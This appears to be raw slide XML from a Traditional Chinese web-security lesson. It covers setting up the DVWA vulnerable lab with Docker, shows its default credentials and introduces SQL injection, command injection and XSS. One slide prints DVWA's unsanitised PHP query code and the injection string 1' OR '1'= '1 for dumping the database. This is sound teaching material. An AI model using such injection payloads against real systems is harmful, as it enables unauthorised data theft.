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348" r:id="rId3"/>
    <p:sldId id="349" r:id="rId4"/>
    <p:sldId id="350" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="292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95" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="305" r:id="rId20"/>
    <p:sldId id="304" r:id="rId21"/>
    <p:sldId id="306" r:id="rId22"/>
    <p:sldId id="269" r:id="rId23"/>
    <p:sldId id="314" r:id="rId24"/>
    <p:sldId id="337" r:id="rId25"/>
    <p:sldId id="338" r:id="rId26"/>
    <p:sldId id="339" r:id="rId27"/>
    <p:sldId id="296" r:id="rId28"/>
    <p:sldId id="272" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="340" r:id="rId33"/>
    <p:sldId id="341" r:id="rId34"/>
    <p:sldId id="273" r:id="rId35"/>
    <p:sldId id="315" r:id="rId36"/>
    <p:sldId id="316" r:id="rId37"/>
    <p:sldId id="317" r:id="rId38"/>
    <p:sldId id="318" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="275" r:id="rId41"/>
    <p:sldId id="302" r:id="rId42"/>
    <p:sldId id="319" r:id="rId43"/>
    <p:sldId id="320" r:id="rId44"/>
    <p:sldId id="342" r:id="rId45"/>
    <p:sldId id="276" r:id="rId46"/>
    <p:sldId id="277" r:id="rId47"/>
    <p:sldId id="278" r:id="rId48"/>
    <p:sldId id="322" r:id="rId49"/>
    <p:sldId id="323" r:id="rId50"/>
    <p:sldId id="298" r:id="rId51"/>
    <p:sldId id="287" r:id="rId52"/>
    <p:sldId id="303" r:id="rId53"/>
    <p:sldId id="324" r:id="rId54"/>
    <p:sldId id="325" r:id="rId55"/>
    <p:sldId id="343" r:id="rId56"/>
    <p:sldId id="288" r:id="rId57"/>
    <p:sldId id="299" r:id="rId58"/>
    <p:sldId id="279" r:id="rId59"/>
    <p:sldId id="280" r:id="rId60"/>
    <p:sldId id="344" r:id="rId61"/>
    <p:sldId id="281" r:id="rId62"/>
    <p:sldId id="345" r:id="rId63"/>
    <p:sldId id="282" r:id="rId64"/>
    <p:sldId id="346" r:id="rId65"/>
    <p:sldId id="283" r:id="rId66"/>
    <p:sldId id="284" r:id="rId67"/>
    <p:sldId id="285" r:id="rId68"/>
    <p:sldId id="327" r:id="rId69"/>
    <p:sldId id="328" r:id="rId70"/>
    <p:sldId id="329" r:id="rId71"/>
    <p:sldId id="286" r:id="rId72"/>
    <p:sldId id="300" r:id="rId73"/>
    <p:sldId id="289" r:id="rId74"/>
    <p:sldId id="290" r:id="rId75"/>
    <p:sldId id="330" r:id="rId76"/>
    <p:sldId id="331" r:id="rId77"/>
    <p:sldId id="347" r:id="rId78"/>
    <p:sldId id="291" r:id="rId79"/>
    <p:sldId id="333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4" d="100"/>
          <a:sy n="124" d="100"/>
        </p:scale>
        <p:origin x="-126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00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1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0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0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1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80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38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BF84-730E-4186-9258-6D4A3FCD7E6B}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2020/3/21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CD3E-8784-49BA-B955-4B92B1782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8" name="矩形 17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539" y="2991756"/>
            <a:ext cx="5568922" cy="557263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網站漏洞測試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6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797660" cy="6924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指令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https://philipzheng.gitbooks.io/docker_practice/content/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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F49C6580-D64D-4892-ABBC-520F0641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47125"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2092569" y="2742871"/>
          <a:ext cx="5175447" cy="24003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3299">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="538078980"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3552148">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="335328442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指令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說明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80209364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docker version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW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查看目前使用的版本 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW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21001642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docker pull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取得</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
                        <a:t>image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589812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docker run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啟動</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
                        <a:t>docker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image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531933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docker stop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停止</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
                        <a:t>docker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image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5874993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docker image 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檢視有多少已下載的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
                        <a:t>images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9694749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docker </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
                        <a:t>ps</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW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列出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
                        <a:t>docker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kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>containers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05070966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9" name="矩形 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6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3232680" cy="6924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 Download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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https://hub.docker.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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5162B3D5-52F5-42A4-B65D-6909705F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32" y="2482545"/>
            <a:ext cx="3513553" cy="28885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6F0493A-1C9C-42D2-AB62-3532449ACDDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806432" y="3292719"/>
            <a:ext cx="1756777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99E418D-80D9-442A-A758-E790B496D6E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381662" y="2896471"/>
            <a:ext cx="278954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搜尋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dvwa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1" name="矩形 1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2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3232680" cy="6924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 Download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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https://hub.docker.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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D8DAF71C-DF9C-4ADA-BE50-6CA4EC00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62" y="3215137"/>
            <a:ext cx="2907232" cy="20645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6B9B172-D0C9-4472-9BB4-F198A16CD1F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1569496" y="2484674"/>
            <a:ext cx="6101927" cy="60016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300" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pull</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3300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0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257506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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 啟動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6B9B172-D0C9-4472-9BB4-F198A16CD1F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938835" y="2384201"/>
            <a:ext cx="7223388" cy="553998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dirty="0"/>
              <a:t>docker run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80:80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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dvwa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BB3F4E4-38EC-419C-AA40-5F711E5C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36" y="3212555"/>
            <a:ext cx="3542639" cy="1800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262A33F-E7F6-4D24-A0C9-2DAF456A72FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246495" y="4112694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-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
              </a:rPr>
              <a:t>一個虛擬的終端機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4BB2B40-A7A3-4010-8886-755E6AB5FF90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455086" y="3490822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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
              </a:rPr>
              <a:t>指定一個端口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7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221413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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞平台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A666C82A-BC3B-4700-9220-F7EEB61D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94" y="1888461"/>
            <a:ext cx="3468659" cy="33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1E36941-83EF-48DF-AA5F-62010DE138C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474904" y="2307923"/>
            <a:ext cx="4972420" cy="29649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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Damn Vulnerable Web Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）    是用來鑑別安全脆弱性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>應用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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有多個模組類型：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暴力破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>跨站請求偽造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令碼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72354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設定資料庫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6B9B172-D0C9-4472-9BB4-F198A16CD1F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339130" y="2290224"/>
            <a:ext cx="4033092" cy="5078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700" dirty="0"/>
              <a:t>打開 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="27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127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0"/>
              <a:t> 或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="27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27E2147-6C1F-48A6-8481-4230A364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30" y="2934808"/>
            <a:ext cx="2692736" cy="2350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5C89E08-E80D-4AD1-BAD7-3BB6D9BB5B62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2398565" y="4833154"/>
            <a:ext cx="1092200" cy="3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37BB055B-5E79-4625-AD45-C87894404B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3490765" y="4420918"/>
            <a:ext cx="2108269" cy="3231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500" dirty="0"/>
              <a:t>直接登入後新增資料庫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CEAA0-BBB0-444D-9594-6C8972F7C605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5488898" y="3349907"/>
            <a:ext cx="24807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100" dirty="0"/>
              <a:t>預設帳密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>Username: admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>Password: password</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="21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0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5536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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞平台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zh-TW" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>四種安全等級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95814D8-7532-45A3-8664-47441658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62" y="2248315"/>
            <a:ext cx="3402211" cy="313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6AE22AD-1133-40E1-9FE3-957BFDF78D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4910753" y="3584211"/>
            <a:ext cx="1092200" cy="69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AD8500A-EC09-4654-8674-8E64CD4526A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152525" y="2576730"/>
            <a:ext cx="2649834" cy="25801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不同等級分不同難度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：簡單</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：普通</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：困難</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：不可能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A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789B402A-F2E0-4E28-B52A-82CD381964EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4851070" y="1463891"/>
            <a:ext cx="4162871" cy="7155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4050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本次教學使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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3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540" y="2991756"/>
            <a:ext cx="5568922" cy="557263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13067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EF666DBD-77E2-4166-AF86-2E3026AB3B6B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r="1936"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152525" y="2713033"/>
            <a:ext cx="3255287" cy="2240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7093659F-BB44-47F1-9049-93784D6F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88" y="2713032"/>
            <a:ext cx="3255287" cy="2240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xmlns="" id="{535627CD-2098-4ABA-BD59-17587FBFD8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059767" y="2844764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4" y="1796728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正常輸入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40180" y="1796728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DA2D1B80-1011-4EC6-AE16-03FC8D3E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34" y="2566966"/>
            <a:ext cx="2734844" cy="2743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368067" y="5109395"/>
            <a:ext cx="45300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633154" y="4421555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12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321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OWASP TOP 10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漏洞類型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HITCON ZERO DAY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網站漏洞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測試平台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本次課程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網站漏洞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(1):SQLI</a:t>
            </a:r>
          </a:p>
          <a:p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網站漏洞測試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(2):COMMAND INJECTION</a:t>
            </a:r>
          </a:p>
          <a:p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實戰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網站漏洞測試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(3):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xss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</a:t>
            </a:r>
          </a:p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2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615581" y="1863650"/>
            <a:ext cx="8044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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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1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'id'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Check database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results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while(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mysqli_fetch_assoc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values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$first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"first_name"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$last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"last_name"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Feedback for end user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"&lt;pre&gt;ID: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&lt;br /&gt;First name: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$first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&lt;br /&gt;Surname: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$last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mysqli_close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?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1100" dirty="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76558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4C461D03-DD02-46A1-86B9-80C857DF76DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2690341" y="2603747"/>
            <a:ext cx="597165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24F3311-B3B3-4BFE-81E4-FF553CA80DE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3446755" y="2592205"/>
            <a:ext cx="17495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使用者輸入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4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615581" y="1863650"/>
            <a:ext cx="80448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>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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1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'id'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Check database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results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while(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mysqli_fetch_assoc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Get values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$first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"first_name"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$last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"last_name"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// Feedback for end user </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="11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"&lt;pre&gt;ID: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&lt;br /&gt;First name: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$first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&lt;br /&gt;Surname: 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$last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mysqli_close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1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]);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1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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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76558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778F6816-D42D-4EE0-9724-A45C65DC0651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7806828">
            <a:off x="4930631" y="2880257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84FB6BE-A5A8-42E8-9CB8-69CEC2BEC316}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2350001"/>
            <a:ext cx="44678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發現沒有對輸入做任何檢查直接做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查詢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5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569275" y="1796728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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="內容版面配置區 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F1CA19D1-F6BB-48F1-B1DD-BB15FF6AA68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96" y="2712478"/>
            <a:ext cx="3271369" cy="2219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D2FA7E16-2343-4551-962A-AF8C72D7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59" y="2713032"/>
            <a:ext cx="3255287" cy="2240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xmlns="" id="{535627CD-2098-4ABA-BD59-17587FBFD8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931160" y="2844764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4925649-F01C-4BE5-B002-480855437BC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1863312" y="3901937"/>
            <a:ext cx="2209259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300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' OR '1'= '1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="33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2B20D14-6226-4170-9E53-F7717BC8C93D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4472698" y="4479018"/>
            <a:ext cx="4416594" cy="60016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300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>撈出資料庫內所有資料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8" name="矩形 17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2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5633DC5-6708-4E52-B8CC-73118A87F099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520292" y="2186257"/>
            <a:ext cx="28600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0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latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=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 OR 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=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 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9" name="矩形 1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F8B98A2-5D3B-4E35-ACD6-0959FD1632B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184189" y="3318086"/>
            <a:ext cx="70146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5633DC5-6708-4E52-B8CC-73118A87F099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520292" y="2186257"/>
            <a:ext cx="28600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0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latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=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 OR 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=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 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520AE92B-3539-4EE9-A072-B8EA831821AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
